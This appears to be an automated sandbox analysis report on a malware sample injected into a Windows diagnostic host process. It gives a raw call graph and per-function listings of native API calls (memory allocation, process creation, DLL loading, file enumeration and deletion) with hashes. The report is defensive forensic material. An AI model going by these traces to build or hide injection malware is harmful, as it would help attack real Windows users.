1dc4d0 98883 1db3d0 RtlFreeHeap 98882->98883 98884 1dc4e5 98883->98884 98885 1c29cc 98886 1c29cf 98885->98886 98887 1c2954 98885->98887 98888 1c6460 2 API calls 98886->98888 98889 1c29e7 98888->98889 98417 4412ad0 LdrInitializeThunk 98418 1b9d80 98421 1ba1fe 98418->98421 98419 1ba7f6 98421->98419 98422 1db040 98421->98422 98423 1db066 98422->98423 98428 1b40a0 98423->98428 98425 1db0ab 98425->98419 98426 1db072 98426->98425 98431 1d5690 98426->98431 98435 1c3430 98428->98435 98430 1b40ad 98430->98426 98432 1d56f1 98431->98432 98434 1d56fe 98432->98434 98453 1c1c60 98432->98453 98434->98425 98436 1c344d 98435->98436 98438 1c3460 98436->98438 98439 1d9db0 98436->98439 98438->98430 98441 1d9dca 98439->98441 98440 1d9df9 98440->98438 98441->98440 98446 1d8a30 98441->98446 98444 1db3d0 RtlFreeHeap 98445 1d9e6c 98444->98445 98445->98438 98447 1d8a4d 98446->98447 98450 4412c0a 98447->98450 98448 1d8a76 98448->98444 98451 4412c11 98450->98451 98452 4412c1f LdrInitializeThunk 98450->98452 98451->98448 98452->98448 98454 1c1c98 98453->98454 98469 1c7fc0 98454->98469 98456 1c1ca0 98457 1c1f68 98456->98457 98480 1db4b0 98456->98480 98457->98434 98459 1c1cb6 98460 1db4b0 RtlAllocateHeap 98459->98460 98461 1c1cc7 98460->98461 98462 1db4b0 RtlAllocateHeap 98461->98462 98463 1c1cd8 98462->98463 98468 1c1d6f 98463->98468 98491 1c6bb0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98463->98491 98466 1c1f23 98487 1d7fd0 98466->98487 98483 1c4700 98468->98483 98470 1c7fec 98469->98470 98492 1c7eb0 98470->98492 98473 1c8019 98475 1c8024 98473->98475 98477 1d9390 NtClose 98473->98477 98474 1c8031 98476 1c804d 98474->98476 98478 1d9390 NtClose 98474->98478 98475->98456 98476->98456 98477->98475 98479 1c8043 98478->98479 98479->98456 98503 1d96a0 98480->98503 98482 1db4c8 98482->98459 98484 1c4724 98483->98484 98485 1c472b 98484->98485 98486 1c4760 LdrLoadDll 98484->98486 98485->98466 98486->98485 98488 1d8031 98487->98488 98490 1d803e 98488->98490 98506 1c1f80 98488->98506 98490->98457 98491->98468 98493 1c7fa6 98492->98493 98494 1c7eca 98492->98494 98493->98473 98493->98474 98498 1d8ac0 98494->98498 98497 1d9390 NtClose 98497->98493 98499 1d8ada 98498->98499 98502 44135c0 LdrInitializeThunk 98499->98502 98500 1c7f9a 98500->98497 98502->98500 98504 1d96bd 98503->98504 98505 1d96cb RtlAllocateHeap 98504->98505 98505->98482 98509 1c1fa0 98506->98509 98522 1c8290 98506->98522 98508 1c24f0 98508->98490 98509->98508 98526 1d11d0 98509->98526 98512 1c21b2 98534 1dc5a0 98512->98534 98513 1c1ffb 98513->98508 98529 1dc470 98513->98529 98516 1c21c7 98518 1c2211 98516->98518 98540 1c0ae0 98516->98540 98518->98508 98520 1c0ae0 LdrInitializeThunk 98518->98520 98544 1c8230 98518->98544 98519 1c8230 LdrInitializeThunk 98521 1c2360 98519->98521 98520->98518 98521->98518 98521->98519 98523 1c829d 98522->98523 98524 1c82bc SetErrorMode 98523->98524 98525 1c82c3 98523->98525 98524->98525 98525->98509 98548 1db340 98526->98548 98528 1d11f1 98528->98513 98530 1dc486 98529->98530 98531 1dc480 98529->98531 98532 1db4b0 RtlAllocateHeap 98530->98532 98531->98512 98533 1dc4ac 98532->98533 98533->98512 98535 1dc510 98534->98535 98536 1db4b0 RtlAllocateHeap 98535->98536 98537 1dc56d 98535->98537 98538 1dc54a 98536->98538 98537->98516 98539 1db3d0 RtlFreeHeap 98538->98539 98539->98537 98541 1c0afc 98540->98541 98555 1d9610 98541->98555 98545 1c8243 98544->98545 98560 1d8930 98545->98560 98547 1c826e 98547->98518 98551 1d94f0 98548->98551 98550 1db371 98550->98528 98552 1d9582 98551->98552 98554 1d9518 98551->98554 98553 1d9595 NtAllocateVirtualMemory 98552->98553 98553->98550 98554->98550 98556 1d962a 98555->98556 98559 4412c70 LdrInitializeThunk 98556->98559 98557 1c0b02 98557->98521 98559->98557 98561 1d89ae 98560->98561 98563 1d895b 98560->98563 98565 4412dd0 LdrInitializeThunk 98561->98565 98562 1d89d0 98562->98547 98563->98547 98565->98562 98890 1bb840 98891 1db340 NtAllocateVirtualMemory 98890->98891 98892 1bceb1 98890->98892 98891->98892 98566 1cc700 98568 1cc729 98566->98568 98567 1cc82c 98568->98567 98569 1cc7d0 FindFirstFileW 98568->98569 98569->98567 98571 1cc7eb 98569->98571 98570 1cc813 FindNextFileW 98570->98571 98572 1cc825 FindClose 98570->98572 98571->98570 98572->98567 98573 1cf900 98574 1cf964 98573->98574 98604 1c6460 98574->98604 98576 1cfa9e 98577 1cfa97 98577->98576 98611 1c6570 98577->98611 98581 1cfb3e 98582 1cfc52 98581->98582 98620 1cf6e0 98581->98620 98583 1d9390 NtClose 98582->98583 98585 1cfc5c 98583->98585 98586 1cfb56 98586->98582 98587 1cfb61 98586->98587 98588 1db4b0 RtlAllocateHeap 98587->98588 98589 1cfb8a 98588->98589 98590 1cfba9 98589->98590 98591 1cfb93 98589->98591 98629 1cf5d0 CoInitialize 98590->98629 98593 1d9390 NtClose 98591->98593 98595 1cfb9d 98593->98595 98594 1cfbb7 98632 1d8e80 98594->98632 98597 1cfc32 98598 1d9390 NtClose 98597->98598 98599 1cfc3c 98598->98599 98600 1db3d0 RtlFreeHeap 98599->98600 98601 1cfc43 98600->98601 98602 1cfbd5 98602->98597 98603 1d8e80 LdrInitializeThunk 98602->98603 98603->98602 98605 1c6493 98604->98605 98606 1c64b7 98605->98606 98636 1d8f20 98605->98636 98606->98577 98608 1c64da 98608->98606 98609 1d9390 NtClose 98608->98609 98610 1c655a 98609->98610 98610->98577 98612 1c6595 98611->98612 98641 1d8d30 98612->98641 98615 1d6f30 98616 1d6f94 98615->98616 98617 1d6fc7 98616->98617 98646 1d04b2 RtlFreeHeap 98616->98646 98617->98581 98619 1d6fa9 98619->98581 98621 1cf6fc 98620->98621 98622 1c4700 LdrLoadDll 98621->98622 98624 1cf717 98622->98624 98623 1cf720 98623->98586 98624->98623 98625 1c4700 LdrLoadDll 98624->98625 98626 1cf7eb 98625->98626 98627 1c4700 LdrLoadDll 98626->98627 98628 1cf848 98626->98628 98627->98628 98628->98586 98631 1cf635 98629->98631 98630 1cf6cb CoUninitialize 98630->98594 98631->98630 98633 1d8e9d 98632->98633 98647 4412ba0 LdrInitializeThunk 98633->98647 98634 1d8eca 98634->98602 98637 1d8f3d 98636->98637 98640 4412ca0 LdrInitializeThunk 98637->98640 98638 1d8f66 98638->98608 98640->98638 98642 1d8d4d 98641->98642 98645 4412c60 LdrInitializeThunk 98642->98645 98643 1c6609 98643->98601 98643->98615 98645->98643 98646->98619 98647->98634 98648 1c2500 98649 1d8a30 LdrInitializeThunk 98648->98649 98650 1c2536 98649->98650 98653 1d9420 98650->98653 98652 1c254b 98654 1d94af 98653->98654 98655 1d944b 98653->98655 98658 4412e80 LdrInitializeThunk 98654->98658 98655->98652 98656 1d94dd 98656->98652 98658->98656 98893 1c72c0 98894 1c72dc 98893->98894 98898 1c732f 98893->98898 98896 1d9390 NtClose 98894->98896 98894->98898 98895 1c7461 98897 1c72f7 98896->98897 98903 1c66f0 NtClose LdrInitializeThunk LdrInitializeThunk 98897->98903 98898->98895 98904 1c66f0 NtClose LdrInitializeThunk LdrInitializeThunk 98898->98904 98900 1c743e 98900->98895 98905 1c68b0 NtClose LdrInitializeThunk LdrInitializeThunk 98900->98905 98903->98898 98904->98900 98905->98895 98659 1d1800 98660 1d181c 98659->98660 98661 1d1858 98660->98661 98662 1d1844 98660->98662 98663 1d9390 NtClose 98661->98663 98664 1d9390 NtClose 98662->98664 98665 1d1861 98663->98665 98666 1d184d 98664->98666 98669 1db4f0 RtlAllocateHeap 98665->98669 98668 1d186c 98669->98668 98670 1c8901 98671 1c890b 98670->98671 98672 1c88f1 98671->98672 98674 1c7240 98671->98674 98675 1c7256 98674->98675 98677 1c728c 98674->98677 98675->98677 98678 1c70b0 LdrLoadDll 98675->98678 98677->98672 98678->98677 98679 1d6100 98680 1d615a 98679->98680 98681 1d6167 98680->98681 98683 1d3b30 98680->98683 98684 1db340 NtAllocateVirtualMemory 98683->98684 98686 1d3b71 98684->98686 98685 1d3c6e 98685->98681 98686->98685 98687 1c4700 LdrLoadDll 98686->98687 98690 1d3bb1 98687->98690 98688 1d3bf0 Sleep 98688->98690 98690->98685 98690->98688 98691 1d6060 LdrLoadDll Sleep NtAllocateVirtualMemory 98690->98691 98691->98690 98906 1d01c0 98907 1d01dd 98906->98907 98908 1c4700 LdrLoadDll 98907->98908 98909 1d01f8 98908->98909 98910 1d6f30 RtlFreeHeap 98909->98910 98911 1d0382 98909->98911 98910->98911 98912 1c9d7a 98913 1c9d23 98912->98913 98916 1c9d7e 98912->98916 98914 1c9d36 98913->98914 98915 1db3d0 RtlFreeHeap 98913->98915 98915->98914 98922 1d92f0 98923 1d9364 98922->98923 98925 1d9318 98922->98925 98924 1d9377 NtDeleteFile 98923->98924 98694 1c3333 98695 1c7eb0 2 API calls 98694->98695 98696 1c3343 98695->98696 98697 1d9390 NtClose 98696->98697 98698 1c335f 98696->98698 98697->98698 98699 1c752c 98700 1c74c4 98699->98700 98700->98699 98702 1c750f 98700->98702 98703 1cb380 98700->98703 98704 1cb3a6 98703->98704 98705 1cb5d0 98704->98705 98730 1d9770 98704->98730 98705->98702 98707 1cb419 98707->98705 98708 1dc5a0 2 API calls 98707->98708 98709 1cb435 98708->98709 98709->98705 98710 1cb509 98709->98710 98711 1d8a30 LdrInitializeThunk 98709->98711 98712 1c5ce0 LdrInitializeThunk 98710->98712 98714 1cb528 98710->98714 98713 1cb497 98711->98713 98712->98714 98713->98710 98717 1cb4a0 98713->98717 98719 1cb5b8 98714->98719 98736 1d85a0 98714->98736 98715 1cb4f1 98716 1c8230 LdrInitializeThunk 98715->98716 98720 1cb4ff 98716->98720 98717->98705 98717->98715 98718 1cb4cf 98717->98718 98733 1c5ce0 98717->98733 98751 1d4810 LdrInitializeThunk 98718->98751 98721 1c8230 LdrInitializeThunk 98719->98721 98720->98702 98725 1cb5c6 98721->98725 98725->98702 98726 1cb58f 98741 1d8650 98726->98741 98728 1cb5a9 98746 1d87b0 98728->98746 98731 1d978a 98730->98731 98732 1d979b CreateProcessInternalW 98731->98732 98732->98707 98752 1d8bf0 98733->98752 98735 1c5d1b 98735->98718 98737 1d85c8 98736->98737 98738 1d861a 98736->98738 98737->98726 98758 44139b0 LdrInitializeThunk 98738->98758 98739 1d863c 98739->98726 98742 1d86cd 98741->98742 98743 1d867b 98741->98743 98759 4414340 LdrInitializeThunk 98742->98759 98743->98728 98744 1d86ef 98744->98728 98747 1d87d8 98746->98747 98748 1d882a 98746->98748 98747->98719 98760 4412fb0 LdrInitializeThunk 98748->98760 98749 1d884c 98749->98719 98751->98715 98753 1d8c9e 98752->98753 98754 1d8c1c 98752->98754 98757 4412d10 LdrInitializeThunk 98753->98757 98754->98735 98755 1d8ce0 98755->98735 98757->98755 98758->98739 98759->98744 98760->98749 98762 1c10a8 PostThreadMessageW 98763 1c10ba 98762->98763 98764 1b9d20 98766 1b9d2f 98764->98766 98765 1b9d6d 98766->98765 98767 1b9d5a CreateThread 98766->98767 98768 1c6f20 98769 1c6f47 98768->98769 98772 1c8060 98769->98772 98771 1c6f6e 98773 1c807d 98772->98773 98779 1d8b10 98773->98779 98775 1c80cd 98776 1c80d4 98775->98776 98777 1d8bf0 LdrInitializeThunk 98775->98777 98776->98771 98778 1c80fd 98777->98778 98778->98771 98780 1d8ba8 98779->98780 98781 1d8b38 98779->98781 98784 4412f30 LdrInitializeThunk 98780->98784 98781->98775 98782 1d8bde 98782->98775 98784->98782 98926 1c5d60 98927 1c8230 LdrInitializeThunk 98926->98927 98928 1c5d90 98927->98928 98930 1c5dbc 98928->98930 98931 1c81b0 98928->98931 98933 1c81f4 98931->98933 98932 1c8215 98932->98928 98933->98932 98938 1d8700 98933->98938 98935 1c8205 98936 1c8221 98935->98936 98937 1d9390 NtClose 98935->98937 98936->98928 98937->98932 98939 1d877a 98938->98939 98941 1d8728 98938->98941 98943 4414650 LdrInitializeThunk 98939->98943 98940 1d879c 98940->98935 98941->98935 98943->98940 98785 1d90a0 98786 1d90cc 98785->98786 98787 1d9154 98785->98787 98788 1d9167 NtCreateFile 98787->98788 98944 1d8860 98945 1d888b 98944->98945 98946 1d88ef 98944->98946 98949 4412ee0 LdrInitializeThunk 98946->98949 98947 1d891d 98949->98947 98955 1d89e0 98956 1d89fd 98955->98956 98959 4412df0 LdrInitializeThunk 98956->98959 98957 1d8a22 98959->98957

                                                                                                        Executed Functions

                                                                                                        Function 001CC700 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 001CC7E1
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 001CC81E
                                                                                                        • FindClose.KERNELBASE(?), ref: 001CC829
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 234def12ba8a326379c096cd91b66ab07e415c6d1f56912ca9d283bef9ae2aeb
                                                                                                        • Instruction ID: c84b00068d61651b06d1e0397559f37b2e0b5e6379ef41e9d6af47fa0a56f259
                                                                                                        • Opcode Fuzzy Hash: 234def12ba8a326379c096cd91b66ab07e415c6d1f56912ca9d283bef9ae2aeb
                                                                                                        • Instruction Fuzzy Hash: 2D318271A00308BBDB20DBA0CC86FEB777C9B54744F144559F908A7281DB70AE458BE0
                                                                                                        Function 001D90A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001D9198
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 345e3c4e28ee16b01450e4ec299a3ed2d1f403407ed5376927da89ad629a36ae
                                                                                                        • Instruction ID: 17897a2479f51451097c371aa43d1bd999ecc647401b36207f4011fc6bef629c
                                                                                                        • Opcode Fuzzy Hash: 345e3c4e28ee16b01450e4ec299a3ed2d1f403407ed5376927da89ad629a36ae
                                                                                                        • Instruction Fuzzy Hash: DE310CB5A11248AFCB14DF98D881EEFB7B8EF88310F104209F919A7340D770A941CBA0
                                                                                                        Function 001D9200 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?), ref: 001D92E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 6c1fb3b12d1e0b828d87ec53090c5bcc01d792e9467395cd05d1c298a7053b79
                                                                                                        • Instruction ID: 9dc3cd487635dc998b45178bfc06360e1bfba0a541f7e11fa5e21c16472d5a9e
                                                                                                        • Opcode Fuzzy Hash: 6c1fb3b12d1e0b828d87ec53090c5bcc01d792e9467395cd05d1c298a7053b79
                                                                                                        • Instruction Fuzzy Hash: 85311E75A00249AFCB14DF98D881EEFB7B9EF88714F10420AFD19A7345D774A911CBA1
                                                                                                        Function 001D94F0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,00000004,?,00000004,00003000,?,?,?,?,?,001D803E,001C1FFB,?,?,001DB371,001D803E), ref: 001D95B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 53e4e2003fe044bb446b4a8e60cc4b958b6560d1b8c8cdde55729b46531f0a0d
                                                                                                        • Instruction ID: 6062036451396a94367782ad8cb7ed32c77f6234738836477fa626deb4c04cd8
                                                                                                        • Opcode Fuzzy Hash: 53e4e2003fe044bb446b4a8e60cc4b958b6560d1b8c8cdde55729b46531f0a0d
                                                                                                        • Instruction Fuzzy Hash: 40213075A10249AFDB10DF98D882EEFBBB9EF98700F00411AFD15A7345D774A9118BA1
                                                                                                        Function 001D92F0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: e8151ce01b20263e155081218890f072b6ec2f7ecda74e17849fcf141be98f00
                                                                                                        • Instruction ID: 695aeab98789cd428aab234fc2ee6ba9df65a090521346bbfbb23febdd38597c
                                                                                                        • Opcode Fuzzy Hash: e8151ce01b20263e155081218890f072b6ec2f7ecda74e17849fcf141be98f00
                                                                                                        • Instruction Fuzzy Hash: B6117371A10608BFD620EBA8DC42FEF776CDF99714F40820AFA1967281D7716902C7E5
                                                                                                        Function 001D9390 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001D93C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: cf3d0388c0448314c7c6c740fea77ae0746f54db5250a4da1a88c7cf2767295a
                                                                                                        • Instruction ID: f0fabbf6cfd9d9232f78f5e57635cb4683269be892d89294c1fb29226e20debd
                                                                                                        • Opcode Fuzzy Hash: cf3d0388c0448314c7c6c740fea77ae0746f54db5250a4da1a88c7cf2767295a
                                                                                                        • Instruction Fuzzy Hash: B1E08C326002147BC220EA69DC01FAB776CDFC5764F918015FA0CAB241CB79F90187F4
                                                                                                        Function 04414650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 3f45cd21a56ab0fc78680462219ff551ae8ff6d6eb265784ac656a497ba63702
                                                                                                        • Instruction ID: fda76d141504e19df2f40b7b4063aad153edd244d23bb1518aa65b73b7600338
                                                                                                        • Opcode Fuzzy Hash: 3f45cd21a56ab0fc78680462219ff551ae8ff6d6eb265784ac656a497ba63702
                                                                                                        • Instruction Fuzzy Hash: A49002616015105265407158490540A60059FF13053D5C216A0555560C8B1CD9559269
                                                                                                        Function 04414340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b75e365fd12febc30f20374f8701f8af3b5381d501471b27e74ebd4345ca0693
                                                                                                        • Instruction ID: d076c4df21f062a9cd2443b7b2a5df9af2ba9fa721f8ad95e97ed100898f737f
                                                                                                        • Opcode Fuzzy Hash: b75e365fd12febc30f20374f8701f8af3b5381d501471b27e74ebd4345ca0693
                                                                                                        • Instruction Fuzzy Hash: F390023160581022B5407158498554A40059FF0305B95C112E0425554C8F18DA565361
                                                                                                        Function 04412C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 832f3fb456f28b37d222e6e1a4947f42b10fdb13ca30d41b5f9befb6dbd96293
                                                                                                        • Instruction ID: cf20fdb259508009e70ba9c65c45350456d0692f42a1e5b2929b09bc6223b9f7
                                                                                                        • Opcode Fuzzy Hash: 832f3fb456f28b37d222e6e1a4947f42b10fdb13ca30d41b5f9befb6dbd96293
                                                                                                        • Instruction Fuzzy Hash: 4A90023120141852F50071584505B4A00058FF0305F95C117A0125654D8B19D9517521
                                                                                                        Function 04412C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 11463fc454a22ae750caa938254dc69a4863c94f40692a12d75efae0f2f8c3ba
                                                                                                        • Instruction ID: 49e84a9ad72fb4b64133c50b17ed102c62476b14c026d63878e98d191c968364
                                                                                                        • Opcode Fuzzy Hash: 11463fc454a22ae750caa938254dc69a4863c94f40692a12d75efae0f2f8c3ba
                                                                                                        • Instruction Fuzzy Hash: D890023120149812F5107158850574E00058FE0305F99C512A4425658D8B99D9917121
                                                                                                        Function 04412CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d17bc5aa3dd7e54eec5516a6c5c435293f8a0a3273461d2b525cc6169d948a43
                                                                                                        • Instruction ID: bf6bef071badcf492e671d79d9983e29ac5f8e98d8036433b5366f910c11260c
                                                                                                        • Opcode Fuzzy Hash: d17bc5aa3dd7e54eec5516a6c5c435293f8a0a3273461d2b525cc6169d948a43
                                                                                                        • Instruction Fuzzy Hash: 9690023120141412F5007598550964A00058FF0305F95D112A5025555ECB69D9916131
                                                                                                        Function 04412D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ecb080a907fad0d90a8e358c87f1f253d5a789751ab2e1b05f38414fc8e7e5b7
                                                                                                        • Instruction ID: 4f682c60fde7e05f6745397a91c25ce55981efb1ccff730a9ca8b994b99373a3
                                                                                                        • Opcode Fuzzy Hash: ecb080a907fad0d90a8e358c87f1f253d5a789751ab2e1b05f38414fc8e7e5b7
                                                                                                        • Instruction Fuzzy Hash: 8390022921341012F5807158550960E00058FE1206FD5D516A0016558CCE19D9695321
                                                                                                        Function 04412D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
